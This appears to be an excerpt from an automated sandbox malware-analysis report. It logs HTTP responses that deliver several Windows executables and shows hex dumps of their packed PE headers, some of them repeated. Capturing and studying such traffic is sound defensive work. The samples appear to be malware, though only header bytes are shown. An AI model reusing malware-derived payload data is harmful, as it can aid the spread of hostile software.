                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 21 Dec 2024 00:15:35 GMTContent-Type: application/octet-streamContent-Length: 1950208Last-Modified: Fri, 20 Dec 2024 23:03:35 GMTConnection: keep-aliveETag: "6765f7c7-1dc200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 97 69 b8 cb d3 08 d6 98 d3 08 d6 98 d3 08 d6 98 6e 47 40 98 d2 08 d6 98 cd 5a 52 98 ce 08 d6 98 cd 5a 43 98 c7 08 d6 98 cd 5a 55 98 b8 08 d6 98 f4 ce ad 98 d6 08 d6 98 d3 08 d7 98 a0 08 d6 98 cd 5a 5c 98 d2 08 d6 98 cd 5a 42 98 d2 08 d6 98 cd 5a 47 98 d2 08 d6 98 52 69 63 68 d3 08 d6 98 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 a8 2c b1 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 da 02 00 00 40 01 00 00 00 00 00 00 10 86 00 00 10 00 00 00 f0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 40 86 00 00 04 00 00 ec 23 1e 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5b 80 41 00 6f 00 00 00 00 d0 40 00 a0 ae 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 94 8c 85 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 c0 40 00 00 10 00 00 00 4e 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 a0 ae 00 00 00 d0 40 00 00 70 00 00 00 5e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 80 41 00 00 02 00 00 00 ce 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 a0 29 00 00 90 41 00 00 02 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 63 63 78 6a 65 70 68 62 00 d0 1a 00 00 30 6b 00 00 ca 1a 00 00 d2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 68 6f 76 7a 73 6e 6d 6e 00 10 00 00 00 00 86 00 00 04 00 00 00 9c 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 10 86 00 00 22 00 00 00 a0 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 21 Dec 2024 00:15:43 GMTContent-Type: application/octet-streamContent-Length: 1825280Last-Modified: Fri, 20 Dec 2024 23:16:02 GMTConnection: keep-aliveETag: "6765fab2-1bda00"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 d1 3c 5f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 ec 03 00 00 ae 00 00 00 00 00 00 00 60 48 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 48 00 00 04 00 00 5f 7b 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 30 05 00 68 00 00 00 00 20 05 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 31 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 10 05 00 00 10 00 00 00 48 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 20 05 00 00 02 00 00 00 58 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 30 05 00 00 02 00 00 00 5a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 29 00 00 40 05 00 00 02 00 00 00 5c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 68 7a 6f 62 77 7a 77 69 00 60 19 00 00 f0 2e 00 00 56 19 00 00 5e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 68 75 7a 78 64 64 72 68 00 10 00 00 00 50 48 00 00 04 00 00 00 b4 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 60 48 00 00 22 00 00 00 b8 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 21 Dec 2024 00:15:52 GMTContent-Type: application/octet-streamContent-Length: 2918912Last-Modified: Fri, 20 Dec 2024 23:16:13 GMTConnection: keep-aliveETag: "6765fabd-2c8a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 28 01 00 00 00 00 00 00 c0 4f 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 4f 00 00 04 00 00 b5 c9 2c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 f0 01 00 00 00 a0 24 00 00 02 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 7a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6e 64 73 64 65 6e 6d 79 00 f0 2a 00 00 c0 24 00 00 e6 2a 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 68 78 6b 64 73 74 64 68 00 10 00 00 00 b0 4f 00 00 06 00 00 00 62 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 4f 00 00 22 00 00 00 68 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 21 Dec 2024 00:16:02 GMTContent-Type: application/octet-streamContent-Length: 970240Last-Modified: Fri, 20 Dec 2024 23:13:40 GMTConnection: keep-aliveETag: "6765fa24-ece00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 15 fa 65 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 1e 05 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 0f 00 00 04 00 00 d8 2f 0f 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 ac 63 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 0e 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 ac 63 01 00 00 40 0d 00 00 64 01 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 b0 0e 00 00 76 00 00 00 58 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 21 Dec 2024 00:16:09 GMTContent-Type: application/octet-streamContent-Length: 2778624Last-Modified: Fri, 20 Dec 2024 23:14:15 GMTConnection: keep-aliveETag: "6765fa47-2a6600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 a0 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 2a 00 00 04 00 00 2d 7c 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 44 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 40 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 44 05 00 00 00 60 00 00 00 06 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 66 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6b 67 78 61 7a 78 6e 74 00 e0 29 00 00 a0 00 00 00 d6 29 00 00 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 64 64 7a 65 69 75 77 00 20 00 00 00 80 2a 00 00 06 00 00 00 3e 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 a0 2a 00 00 22 00 00 00 44 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 21 Dec 2024 00:16:10 GMTContent-Type: application/octet-streamContent-Length: 2778624Last-Modified: Fri, 20 Dec 2024 23:14:17 GMTConnection: keep-aliveETag: "6765fa49-2a6600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 a0 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 2a 00 00 04 00 00 2d 7c 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 44 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 40 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 44 05 00 00 00 60 00 00 00 06 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 66 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6b 67 78 61 7a 78 6e 74 00 e0 29 00 00 a0 00 00 00 d6 29 00 00 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 64 64 7a 65 69 75 77 00 20 00 00 00 80 2a 00 00 06 00 00 00 3e 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 a0 2a 00 00 22 00 00 00 44 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 21 Dec 2024 00:16:16 GMTContent-Type: application/octet-streamContent-Length: 2918912Last-Modified: Fri, 20 Dec 2024 23:16:13 GMTConnection: keep-aliveETag: "6765fabd-2c8a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 28 01 00 00 00 00 00 00 c0 4f 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 4f 00 00 04 00 00 b5 c9 2c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 f0 01 00 00 00 a0 24 00 00 02 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 7a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6e 64 73 64 65 6e 6d 79 00 f0 2a 00 00 c0 24 00 00 e6 2a 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 68 78 6b 64 73 74 64 68 00 10 00 00 00 b0 4f 00 00 06 00 00 00 62 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 4f 00 00 22 00 00 00 68 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
